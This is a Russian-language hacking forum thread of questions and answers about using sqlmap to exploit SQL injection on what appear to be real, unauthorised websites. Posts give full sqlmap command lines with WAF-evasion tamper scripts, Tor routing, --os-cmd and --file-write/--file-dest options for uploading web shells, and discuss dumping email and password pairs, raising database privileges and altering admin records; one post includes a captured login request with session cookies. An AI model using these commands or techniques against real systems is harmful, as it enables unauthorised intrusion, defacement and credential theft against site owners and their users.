Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Hedorda

    Hedorda New Member

    Joined:
    8 Aug 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    А как добавить страницу на сайт с помощью SQL injection? Видел как хакеры hentaic0de team добавили страницу anon.php. На том сайте была скюля вида ?id=222.
     
  2. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Покажи о чём ты ?
     
  3. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    93
    Likes Received:
    68
    Reputations:
    3
    Шелл залили? Это не скуля такого вида, это уязвимый параметр
     
  4. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,553
    Reputations:
    40
    Hedorda likes this.
  5. Hedorda

    Hedorda New Member

    Joined:
    8 Aug 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Не совсем. Там root прав нет. Права только на чтение.
     
  6. Hedorda

    Hedorda New Member

    Joined:
    8 Aug 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
  7. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    162
    Likes Received:
    4
    Reputations:
    0
    [14:42:53] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 41 times

    ASP.NET RequestValidationMode
    какой темпер юзать?
     
  8. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    93
    Likes Received:
    68
    Reputations:
    3
    Четверг, с помидорами творог.
    Какой зонт брать?
     
  9. z0mbie86

    z0mbie86 New Member

    Joined:
    25 Jul 2009
    Messages:
    28
    Likes Received:
    0
    Reputations:
    0
    Извините если не в том разделе,
    возникла проблема с Microsoft SQL Server/Sybase stacked queries (comment)
    Дело в том, что я с помощью sqlmap вытаскиваю список баз, таблицы, текущий пользователь, но никак не получается вытащить колонки и инфу из таблиц.
    На каждую таблицу sqlmap предлагает брутить колонки, а на инфу говорит что таблица содержит 0 строк (Колонки указывал вручную. т.к. знаю что в некоторых таблицах есть такая)
    Направьте на путь истинный, подскажите методы решения.

    Запрос sqlmap -r "file.txt" --random-agent --tor --time-sec=50 --dbms=MsSQL
     
  10. rudu2

    rudu2 New Member

    Joined:
    16 Dec 2016
    Messages:
    45
    Likes Received:
    3
    Reputations:
    0
    Вопрос.Есть скуля как через sqlmap изменить к примеру в таблице user где стоит первый admin изменить на имя к примеру test.
     
  11. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    303
    Likes Received:
    21
    Reputations:
    0
    Исследую сайтик с уязвимостью, но юзер базы не dba, а как поднять права, чтобы можно было загрузить шел, слить файлы с сервака ? Нужно os-shell или метасплойт сессию открывать и прописывать права юзеру базы через консоль винды ( сервер на вин2003 компе).
     
  12. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    303
    Likes Received:
    21
    Reputations:
    0
    Еще заметил sqlmap иногда неверно определяет имена баз, вот такое мне выдал mas\x81er имя базы, как я понял ошибся в символе, нужно его повторно запросить сделать, но вот как сделать, чтобы он начал заново, не удаляя файлик базы слитой ?
     
  13. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    --fresh-queries
     
  14. dR0ny

    dR0ny New Member

    Joined:
    20 Jan 2014
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Доброго денечка всем.
    Кручу один сайтец уже хз сколько времени, это пздц какой-то. В общем Бурп нашел такой алярм :

    POST /signin.html HTTP/1.1
    Host: site
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Referer: http://site.com/signin.html
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 77
    Cookie: LiveWSNET66797313=1503752825401440622504; NNET66797313fistvisitetime=1503752825413; PHPSESSID=4702098cba379ae416288b50eeafccdb; LiveWSNET66797313sessionid=1503929382945682447623; NNET66797313visitecounts=2; _ga=GA1.2.632765216.1503752824; _gid=GA1.2.1567938367.1503934215; NNET66797313lastinvite=1503938212470; _uetsid=_uet05999b35; NNET66797313LR_cookie_t0=1; NNET66797313lastvisitetime=1503940317871; NNET66797313visitepages=18

    referer=http%3a%2f%2fwww.site.com%2fsitemap.html&memberName=&memberPassWord=

    Правильно ли я прописываюсь в sqlmap?

    -u "http://site.com/signin.html" -v 3 --tamper="between,randomcase,space2comment" --random-agent --no-cast --time-sec=10 --cookie="LiveWSNET66797313=1503752825401440622504; NNET66797313fistvisitetime=1503752825413; PHPSESSID=4702098cba379ae416288b50eeafccdb; LiveWSNET66797313sessionid=1503929382945682447623; NNET66797313visitecounts=2; _ga=GA1.2.632765216.1503752824; _gid=GA1.2.1567938367.1503934215; NNET66797313lastinvite=1503938212470; _uetsid=_uet05999b35; NNET66797313LR_cookie_t0=1; NNET66797313lastvisitetime=1503940317871; NNET66797313visitepages=18" --data "referer=http%3a%2f%2fwww.site.com%2fsitemap.html&memberName=&memberPassWord="

    Ребят как раскрутить? Также срабатывает WAF...
     
    #494 dR0ny, 28 Aug 2017
    Last edited: 28 Aug 2017
  15. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    303
    Likes Received:
    21
    Reputations:
    0
    С этой опцией он начинает обновлять все записи. Как конкретную запись заставить его проверить на ошибки ?
     
    #495 roman921, 29 Aug 2017
    Last edited: 29 Aug 2017
  16. dR0ny

    dR0ny New Member

    Joined:
    20 Jan 2014
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Ребят, помогите, скулю нашел, имя БД выводит, но не могу получить Имена таблиц, соответственно и колонок, дабы дампнуть емейл:пасс
    Скрин
    [​IMG]


    Что пишу в Мапе:

    -u "http://www.site:80/news/news.html?date=2016-09" --level=3 --risk=3 --random-agent --tor -D (DBS) --tables --no-cast -v 3 --identify-waf --tamper="between,randomcase,space2comment" --threads=10
     
  17. brown

    brown New Member

    Joined:
    16 Oct 2016
    Messages:
    162
    Likes Received:
    4
    Reputations:
    0
    Скорей всего блокируется Select хз меня такая же проблема была,не нашел какой темпер юзать,если кто поможет буду благодарен
     
  18. MrBa

    MrBa New Member

    Joined:
    10 Jan 2017
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    Пытаюсь залить шелл. ls-dbs:true
    Вот запрос - sqlmap -u "http://xxxxxx.com/product/shopview.php?shop=51479" --dbms=mysql --timeout=10 --time-sec=10 --random-agent --os-cmd -v 1

    путь есть, указываю -
    please provide a comma separate list of absolute directory paths: /home/xxxx/public_html/images/main

    но он обращается сюда и подставляет из запроса product/shopview.php/ -
    [WARNING] unable to upload the file stager on '/home/xxxx/public_html/images/main/product/shopview.php/'

    как избавиться от этого? Ведь указываю путь куда именно залить файл
     
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    810
    Reputations:
    90
    Code:
        --file-write=WFILE  Write a local file on the back-end DBMS file system  --- локальный путь до файла
        --file-dest=DFILE   Back-end DBMS absolute filepath to write to  --- куда лить на удаленном хосте
    
    а вообще чего руками то не залить
     
    _________________________
    MrBa likes this.
  20. MrBa

    MrBa New Member

    Joined:
    10 Jan 2017
    Messages:
    12
    Likes Received:
    3
    Reputations:
    0
    точно

    Спасибо за развернутый ответ. Изучал мануал. Вы наверное родились с этими знаниями. Горжусь вами. Просто задал вопрос
     
Loading...